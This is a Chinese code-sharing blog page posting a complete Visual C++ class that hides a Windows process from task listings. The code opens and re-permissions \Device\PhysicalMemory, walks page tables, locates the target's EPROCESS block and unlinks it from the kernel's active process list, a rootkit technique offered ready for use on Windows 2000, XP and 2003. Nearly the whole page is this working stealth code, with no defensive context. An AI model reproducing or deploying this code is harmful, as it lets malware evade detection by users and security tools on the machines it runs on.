vc 隐藏进程
2014-03-25 09:31
302 查看
#ifndef HIDEPROCESS_H
#define HIDEPROCESS_H
class CHideProcess
{
public:
// 接口:隐藏当前进程
static BOOL HideCurrent();
// 接口:隐藏当前进程
static BOOL HideByID(DWORD dwID);
// 析构
virtual ~CHideProcess();
protected:
static BOOL InitNTDLL();
static BOOL YHideProcess(DWORD dwID);
static VOID CloseNTDLL();
static VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
static HANDLE OpenPhysicalMemory();
static PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
static ULONG GetData(PVOID addr);
static BOOL SetData(PVOID addr,ULONG data);
static DWORD GetEprocessFromPid (ULONG PID);
// long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);
protected:
static BOOL m_bInit;
static CHideProcess m_NoAction;
private:
// 构造析构
CHideProcess();
};
#endif// HideProcess.cpp: implementation of the CHideProcess class.
//进程隐藏程序
// 要隐藏时调用HideProcess即可
//////////////////////////////////////////////////////////////////////
#include "stdafx.h"
#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>
#include "HideProcess.h"
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
//
// SYSTEM_INFORMATION_CLASS
//
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
//
// SYSTEM_HANDLE_INFORMATION
// Information Class 16
//
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) (
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL CHideProcess::m_bInit = FALSE;
CHideProcess CHideProcess::m_NoAction;
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
CHideProcess::CHideProcess()
{
m_bInit = InitNTDLL();
}
CHideProcess::~CHideProcess()
{
CloseNTDLL();
}
// load dll and get functions
BOOL CHideProcess::InitNTDLL()
{
// load dll
if (NULL == g_hNtDLL)
{
g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
if (NULL == g_hNtDLL)
{
return FALSE;
}
}
// get functions
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
if ((RtlInitUnicodeString == NULL)
|| (ZwOpenSection == NULL)
|| (ZwQuerySystemInformation == NULL))
{
return FALSE;
}
m_bInit = TRUE;
return TRUE;
}
//---------------------------------------------------------------------------
VOID CHideProcess::CloseNTDLL()
{
if (NULL != g_hNtDLL)
{
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
m_bInit = FALSE;
}
}
//---------------------------------------------------------------------------
VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
DWORD dwRes = GetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&pSD
);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = _T("CURRENT_USER");
dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
pNewDacl,
NULL
);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
}
//---------------------------------------------------------------------------
HANDLE CHideProcess::OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);
if (5 != g_osvi.dwMajorVersion)
return NULL;
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; // 2k
case 1:
PhyDirectory = 0x39000;
break; // xp
case 2:
PhyDirectory = 0x39000;
break; // 2k03
default:
AfxMessageBox(_T("init PhysicalMemory: Unknown version..."));
TRACE(_T("init PhysicalMemory: Unknown version...\n"));
return NULL;
}
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}
if(!NT_SUCCESS(status))
{
AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed..."));
TRACE(_T("Open section: \\Device\\PhysicalMemory failed...\n"));
return NULL;
}
TRACE(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory);
g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection
g_hMPM, // handle
FILE_MAP_READ|FILE_MAP_WRITE,
0, // offset high part
PhyDirectory, // offset low part
0x1000 // size
);
if( g_pMapPhysicalMemory == NULL )
{
AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
TRACE(_T("\\Device\\PhysicalMemory MapViewOfFile failed..."));
return NULL;
}
return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr;
ULONG PGDE = BaseAddress[VAddr>>22];
ULONG PTE;
ULONG PAddr;
if (0 == (PGDE & 1))
return 0;
ULONG tmp = PGDE & 0x00000080;
if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
TRACE(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000);
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if (0 == (PTE&1))
return 0;
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG CHideProcess::GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
TRACE(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"),
g_pMapPhysicalMemory, addr, phys);
TRACE(_T("GetData() OffSet: %p\n"), phys & 0xfffff000);
PULONG tmp = (PULONG)MapViewOfFile(
g_hMPM,
FILE_MAP_READ|FILE_MAP_WRITE,
0,
phys & 0xfffff000, // offset low part
0x1000 // size
);
if (0 == tmp)
return 0;
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
//---------------------------------------------------------------------------
BOOL CHideProcess::SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
TRACE(_T("SetData() OffSet: %p\n"), phys & 0xfffff000);
PULONG tmp = (PULONG)MapViewOfFile(
g_hMPM,
FILE_MAP_WRITE,
0,
phys & 0xfffff000,
0x1000
);
if (0 == tmp)
return FALSE;
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
return TRUE;
}
//---------------------------------------------------------------------------
/*
long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1 ;
}
//*/
//---------------------------------------------------------------------------
DWORD CHideProcess::GetEprocessFromPid (ULONG PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD dwCurrentID = GetCurrentProcessId();
// TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID);
// LocateNtdllEntry( );
//打开自身句柄,这样才能在 handle 列表中找到自己, PROCESS 对应 ObjectTypeNum 为5
HANDLE hProc = OpenProcess(
// PROCESS_ALL_ACCESS,
PROCESS_QUERY_INFORMATION,
FALSE,
PID // GetCurrentProcessId() //
);
if (NULL == hProc)
{
TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError());
return 0;
}
for ( size = 1024; ; size *= 2 )
{
if ( NULL == ( buf = calloc( size, 1 ) ) )
{
TRACE( _T("calloc( %u, 1 ) failed\n"), size );
TRACE(_T("calloc( %u, 1 ) failed\n"), size );
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL );
if ( !NT_SUCCESS( status ) )
{
if ( STATUS_INFO_LENGTH_MISMATCH == status )
{
free( buf );
buf = NULL;
continue;
}
else
{
TRACE( "ZwQuerySystemInformation() failed\n");
TRACE( "ZwQuerySystemInformation() failed\n");
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
}
else
{
break;
}
} /* end of for */
//返回到缓冲区的首先是一个ULONG类型的数据,表示有多少数组
NumOfHandle = *((PULONG)buf);
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4);
for(i = 0; i < NumOfHandle; i++)
{
if(h_info->ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) )
{
// TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"),
// PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber);
if (h_info->Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5)
{
// TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"),
// PID, hProc, h_info.Object);
DWORD dwRet = (DWORD)(h_info->Object);
if (buf != NULL)
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return dwRet;
}
}
}
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
// 隐藏进程主函数
BOOL CHideProcess::YHideProcess(DWORD dwID)
{
//
if (!m_bInit)
{
AfxMessageBox(_T("load NTDLL failed..."));
TRACE(_T("load NTDLL failed...\n"));
return FALSE;
}
// 获得指向进程的 EPROCESS 数据块的指针
ULONG process = (ULONG)GetEprocessFromPid(dwID);
if (process == 0)
{
//
TRACE(_T("GetEprocessFromPid() failed...\n"));
return FALSE;
}
TRACE(_T("GetEprocessFromPid() process = %p...\n"), process);
// 这个是打开对应的系统内存,并且映射为一个核心对象
if (NULL == OpenPhysicalMemory())
{
AfxMessageBox(_T("OpenPhysicalMemory() failed..."));
TRACE(_T("OpenPhysicalMemory() failed...\n"));
return FALSE;
}
//
// 下面的两个 if 完成对 Windows 的系统版本判断(只判断了2K和XP),
// 并且根据不同的系统确定 EPROCESS 块中两个指针 FLINK 和 BLINK 的偏移位置
ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
// in Win2000/Vista:
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
}
else if ((1 == g_osvi.dwMinorVersion)
|| (2 == g_osvi.dwMinorVersion))
{
// in WinXP: in Win2003
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}
// ****
TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw);
// 下面的两个SetData完成对进程活动链的更改,
// 也就是让进程活动链跳过当前进程的EPROCESS块
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw);
// 完成了
UnmapViewOfFile(g_pMapPhysicalMemory);
g_pMapPhysicalMemory = NULL;
CloseHandle(g_hMPM);
g_hMPM = NULL;
return TRUE;
}
// 隐藏进程接口
BOOL CHideProcess::HideCurrent()
{
TRACE(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId());
return YHideProcess(GetCurrentProcessId());
}
// 隐藏进程接口
BOOL CHideProcess::HideByID(DWORD dwID)
{
TRACE(_T("Hide Process ID = %d \n"), dwID);
return YHideProcess(dwID);
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Java中的类装载机制、反射机制、JDK5.0版本新加入一些特性
- IIS 部署MVC相关设置
- 全排列
- MPPT算法
- python closure
- 使用AIDL实现进程间的通信之复杂类型传递 .
- 一个整数数组,长度为n,将其分为m份,使各份的和相等,求m的最大值
- java实现有条件字符串全排列输出
- 如何用敏捷方式来做事
- Python基础教程第九章--------多么痛的领悟
- Hashtable的实现原理
- 智能指针 shared_ptr 的使用方法
- SQL连表查询
- locale的设定及其LANG、LC_ALL、LANGUAGE环境变量的区别
- Java Tomcat 中调用.net DLL的方法
- sql2005 用户 可能联接到数据库但 登录失败, 的因
- SMTP命令与ESMTP命令简介(附带命令通信)
- 告别充电、直接更换电池,只是电动车的一场梦?
- 在 SELECT 查询中使用分组集
- 在linux下php挂接mysql.so扩展的方法